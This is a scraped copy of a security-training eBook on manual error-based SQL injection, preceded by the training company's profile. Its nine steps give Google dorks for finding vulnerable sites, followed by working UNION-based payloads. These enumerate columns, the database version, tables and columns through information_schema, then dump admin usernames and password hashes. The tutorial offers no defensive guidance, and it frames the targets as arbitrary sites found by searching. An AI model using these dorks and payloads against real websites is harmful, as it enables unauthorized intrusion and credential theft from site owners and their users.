7/29/2019 Seculabs eBook - SQL Injection Error Based - Manually

http://slidepdf.com/reader/full/seculabs-ebook-sql-injection-error-based-manually 1/12

7/29/2019 Seculabs eBook - SQL Injection Error Based - Manually

http://slidepdf.com/reader/full/seculabs-ebook-sql-injection-error-based-manually 2/12

 

SECUGENIUS SECURITY SOLUTIONS 

--------------------------------------------------------------------------------------

(A UNIT OF HARKSH TECHNOLOGIES PVT. LTD)

Company Profile:

Secugenius Security Solutions is a Student Entrepreneurial Company started by 2 Social Student

Entrepreneurs in 2010 with an aim to make our country Cyber Crime Free. We at SECUGENIUS

are headquartered at Ludhiana, the Manchester of Punjab. The main activities of Secugenius

Security Solutions are providing training in Information Security and various professional courses.

Secugenius Security Solutions is an organization which believes in inventing and implementing newideas to influence the technological minds of the youngsters

Looking at the number of Cyber Crimes since last many years, We at Secugenius Security

Solutions provides training on Ethical hacking & Cyber Security to students, IT Professionals, Bank 

Employees, Police officials.

Secugenius conducts workshops in all parts of the country in various Colleges/institutions for the

benefit of the students & making them aware of the latest trends in technological era of the

Computer age. We believe in spreading knowledge to all the youngsters & growing minds of the

nation so that they could serve the nation with perfect skill-sets in the field of Cyber Crime

Investigation & Forensic Sciences

Secugenius provides various security solutions to its clients by securing their websites from cyber

attacks. We provide training to college students, graduates and professionals in various fields.

Education is delivered to students through two modes i.e. Regular mode and Distance mode which

are available as short term and long term courses.

In the workshops conducted by Secugenius, participants can claim to be trained by the highly

experienced & skilled corporate trainers from different parts of the nation. We believe in making

the base of students to be as strong as possible. All the modules have been designed in order to

provide students with specialized knowledge by specialized trainers.

This library was furnished, managed and funded by the Founders and Directors of Secugenius

Er. Harpreet Khattar & Er. Kshitij Adhlakha. The overall resource person for the content of 

the series of this Digital Library is Er. Chetan Soni - Sr. Security Specialist, Secugenius Security

Solutions.

This Online Digital Library has been initiated as a free resource & permanent

resource on specialization basis for every student of Team Secugenius.

7/29/2019 Seculabs eBook - SQL Injection Error Based - Manually

http://slidepdf.com/reader/full/seculabs-ebook-sql-injection-error-based-manually 3/12

 

SQL Injection Error Based – Manually

Product ID No: SG/ODL/13038

Founder & Director: Harpreet Khattar & Kshitij Adhlakha

Resource Person: Chetan Soni

Secugenius Security Solutions 

SCO-13A, Model Town Extn, Near Krishna Mandir,

Ludhiana-141002, Punjab – India

support@secugenius.com, info@secugenius.com 

www.secugenius.com , www.seculabs.in 

7/29/2019 Seculabs eBook - SQL Injection Error Based - Manually

http://slidepdf.com/reader/full/seculabs-ebook-sql-injection-error-based-manually 4/12

 

What is SQL Injection?

SQL injection (Structured Query Language Injection) is the first step in theentry to exploiting or hacking websites.

Sqli is just basically injecting queries into a database or using queries to getauthorization bypass as an admin.

Things you should know:

Data is in the columns and the columns are in tables and the tables arein the database.

Step 1 – 

Finding SQLI Vulnerable sits is extremely easy all you need to do is somegoogling.

Here are some Google dorks to find some vulnerable websites,

trainers.php?id=article.php?ID=games.php?id=newsDetail.php?id=news_view.php?id=opinions.php?id=pages.php?id=view.php?id=website.php?id=

detail.php?ID=Productinfo.php?id=releases.php?id=shopping.php?id=productdetail.php?id=section.php?id=page.php?id=

7/29/2019 Seculabs eBook - SQL Injection Error Based - Manually

http://slidepdf.com/reader/full/seculabs-ebook-sql-injection-error-based-manually 5/12

 

For Example – Our URL of the page will look like this ,

http://example.com/gallery.php?id=126

So to find this type of link, you can also use this type of Google dork site:example.com id

Step 2 – 

To check that it is vulnerable, all you have to do is add ‗ in the end.

If it shows some type of error like ― You have an error in your SQLSyntax,‖ then it means it is vulnerable to SQL Injection. 

Example – 

http://example.com/gallery.php?id=126 ’  

7/29/2019 Seculabs eBook - SQL Injection Error Based - Manually

http://slidepdf.com/reader/full/seculabs-ebook-sql-injection-error-based-manually 6/12

 

Step 3 – 

 After finding vulnerability, the next step you need to take is to find thenumber of columns.

So, for finding the columns, you need to add  ―order by <Column No>-- ― in the end of the URL. 

Example – 

(No Error) http://example.com/gallery.php?id=126  order by 1 — (No Error) http://example.com/gallery.php?id=126  order by 2 — (No Error) http://example.com/gallery.php?id=126  order by 3 — (No Error) http://example.com/gallery.php?id=126  order by 4 — (No Error) http://example.com/gallery.php?id=126  order by 5 — (No Error) http://example.com/gallery.php?id=126  order by 6 — (No Error) http://example.com/gallery.php?id=126  order by 7 — (Error!!) http://example.com/gallery.php?id=126 order by 8 — 

If you get an error that means you should lower the number of columns.

If the page opened normally that means the number of columns is between 1

and 7. So In this case, we got an error on 8th

and 7th

opened normally.

7/29/2019 Seculabs eBook - SQL Injection Error Based - Manually

http://slidepdf.com/reader/full/seculabs-ebook-sql-injection-error-based-manually 7/12

 

Step 4 – 

Now Next step is to finding the accessible columns,

Now we have the no. of columns we need to get the column no. that we cangrab information from. So we can do that by adding a ―- ― before 7 andreplacing the ―order by #‖ with ―union all select‖ and columns number. 

Example – 

http://example.com/gallery.php?id=-126  union all select 1,2,3,4,5,6,7--

So we should get vulnerable column numbers.

(In this case, Vulnerable Column No. = 4)

7/29/2019 Seculabs eBook - SQL Injection Error Based - Manually

http://slidepdf.com/reader/full/seculabs-ebook-sql-injection-error-based-manually 8/12

 

Step 5 – 

Now Next step is to find the database version from this vulnerable columnnumber,

So Here, We found only No. 4 are vulnerable so we will use them to get thedatabase version.

If the database is under 5  that means we will have to guess the table names.So we need to replace one of the vulnerable columns by ―@@version‖. 

Example – 

http://example.com/gallery.php?id=-126  union all select 1,2,3,@@version,5,6,7--

In our case, we got ―5.1.41-community‖. 

7/29/2019 Seculabs eBook - SQL Injection Error Based - Manually

http://slidepdf.com/reader/full/seculabs-ebook-sql-injection-error-based-manually 9/12

 

Step 6 – 

Now we need to get the table name we want to access,

So we need to replace ―@@version‖ with ―table_name‖ and add after thelast columns number ―FROM information_schema.tables-- ― 

Example – 

http://example.com/gallery.php?id=-126   union all select 1,2,3,table_name,5,6,7

FROM information_scheman.tables--

It shows all tables. Now we will search the table we want to access.

We should find something with admin on it and in this case it’s ―admin‖  

7/29/2019 Seculabs eBook - SQL Injection Error Based - Manually

http://slidepdf.com/reader/full/seculabs-ebook-sql-injection-error-based-manually 10/12

 

Step 7 – 

Now we need to get the ASCII value of ―admin‖  

From this Website we get the ASCII value of ―admin‖ 

http://easycalculation.com/ascii-hex.php

So, The ASCII value is ―97 100 109 105 110‖  

Now Remove all characters in between the numbers and add the comma ― ,‖ between each number,

Example – 97,100,109,105,110

7/29/2019 Seculabs eBook - SQL Injection Error Based - Manually

http://slidepdf.com/reader/full/seculabs-ebook-sql-injection-error-based-manually 11/12

 

Step 8 – 

Now We Replace the URL ―table_name‖ to ―column_name‖ and change ―information_schema.tables‖ to ―information_schema.columns‖ and

add ―where table_name=char(ASCII Value)-- ― 

In our case, at the place of ASCII Value, we put (97,100,109,105,110) — 

Example – 

http://example.com/gallery.php?id=-126  union all select 1,2,3,column_name,5,6,7 from

information_schema.columns where table_name=char(97,100,109,105,110)--

7/29/2019 Seculabs eBook - SQL Injection Error Based - Manually

http://slidepdf.com/reader/full/seculabs-ebook-sql-injection-error-based-manually 12/12

 

Step 9 – 

Now We Search for the ―username‖ and ―pass‖ 

Remove Everything after the 7 and add ―From admin-- ― and Replace ―column_name‖ with ―concat(username,0x3a,pass)‖  0x3a  – The ASCII Value of ―:‖ (Separator) 

Example – 

http://example.com/gallery.php?id=-126   union all select

1,2,3,concat(username,0x3a,pass),5,6,7 from admin--

 And you’re done the username is ―superauthor‖ and Password is ―a526e922b8c63041b7fb8df44d8966c ‖  

In this case, the password in encrypted with Hashes.

By using Hash Detectors, you can easily find the type of the encryption.